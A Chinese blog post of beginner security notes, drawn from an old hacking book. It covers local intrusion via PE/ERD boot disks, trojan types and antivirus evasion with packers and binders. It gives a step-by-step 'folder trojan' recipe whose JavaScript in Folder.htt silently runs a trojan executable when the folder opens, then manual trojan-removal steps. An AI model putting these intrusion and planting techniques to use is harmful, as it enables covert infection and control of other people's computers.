安全入门级小技巧（一）

博士以来，从硕士的嵌入式转到SDN，然后又去研究其中的安全问题。 我向来认为，没有研究可以使空中楼阁，传统网络的安全研究总会是一项基本功。当然，我曾经问过做安全的大师级人物，他表示学习安全需要补的课很多，从基本共来说，反汇编，操作系统，网络协议栈等等都是基础，密码学更不多说。 我很是恶补了一番，从课本到mooc，但是安全撇除理论的东西，艰深的东西，还有很多有意思的小东西，所谓技。 理论的大牛往往看不上技这种东西，正如金庸小说中，内里高深者，一套太祖长拳也能打遍天下，否则，林镇南有着辟邪剑谱一样是渣渣。 问题是我现在处于的武力值也就笑傲江湖里的水平，所以积累一点小技巧也无可厚非。

本来一般来说，这时候就是总结一下诸如查点，踩点，google黑客之类的内容，科普一下namp，wireshark之流的用法。可惜，前阵子看这个时候木有想起来写博客，后面有精力再写。

这里先谈谈最基本的本地入侵。其实一开始想象黑客，最基本的也是这个事情，你得先能进别人的机器。抱有一定的幻想，我看了下图书馆顺来的邓吉写的黑客入门书籍，发现原来就是用ERD commander 或者PE（如深山红叶工具箱）。进去以后，c盘就是本地硬盘，不费吹灰之力，就可以获取修改本地文件。甚至修改原系统的登陆口令，也就是利用ERD 中提供的LockSmith. 同理放个木马的服务器端也是简单易行。这一段所谓的技看完之后，我发现其实任何系统，只要用个u盘做个类似PE盘的东西，都可以让他从u盘启动，从而进入，这里的关键技术是本地硬盘和启动系统的关联。 这是个关键技术，在我看来，可惜，入门么，这东西自然忽略了。后面深入以后，我会补一下的。这里mark一下。

木马种类很多，大体的思路还是将服务器端放到目标主机，然后打开特定的端口服务。这里比较有意思的是伪装技术和反弹端口技术。冰河木马和广外女生算是入门级木马，基本就是在客户端上设置配置服务器程序，然后就可以进行一系列操作，远程控制，捕获口令，修改注册表，文件操作等等。让木马服务器主动连接（反弹端口的灰鸽子）和进程隐藏的方式，是号称第三代和第四代木马技术。通过加壳技术（ASPACK ,UPX,WINU pack,FSG等）躲过杀毒软件的病毒特征库匹配也是很有意思的技术。用Deception Binder 软件合并软件是种植木马非常有用的小技巧。可惜这本入门书籍11年的版本，这几年应该还有些新的发展，后面我会继续跟进。

分享入门书籍中一段关于文件夹木马制作的过程
1）准备工作：新建文件夹，双击打开，工具栏查看->自定义文件夹 在自定义文件夹向导中选择或编辑该文件夹的HTML模板
更改文件夹模板-> 标准。完成以后，多出来Folder Setting 和desktop.ini.
2)接下来在 Folder.htt文件的之后，加上一段JavaScript代码：

<Script language="javascript">run_exe="OBJECT ID=\"RUNIT\"WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""run_exe+="CODEBASE=\"木马.exe#version=1,1,1,1\">"run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"run_exe+="<OBJECT>"document.open();document.clear();document.writeln(run_exe);</script>

木马的手动删除
1）冰河木马： 注册表\我的电脑\HKEY_CLASSES_ROOT\texfile\shell\open\command 记下默认数据
2）将其改为 “C:\Windows\notepad.exe %1”
3)进入DOS模式，删除默认数据对应的exe文件
4）重启电脑。

其他木马手动杀出都是差不多的套路，只是注册表关注不同的键值，删除不同的文件。或者比如蓝色火焰这种，用netstat -a 看是否有特定端口（eg. 19191或9191）被打开

PS： 开机进入DOS界面的：开机，在出现Windows系统界面之前，按下键盘上的“F8”键，即可进入Windows“功能菜单”界面。然后利用方向键选择“命令行模式”即可进入DOS界面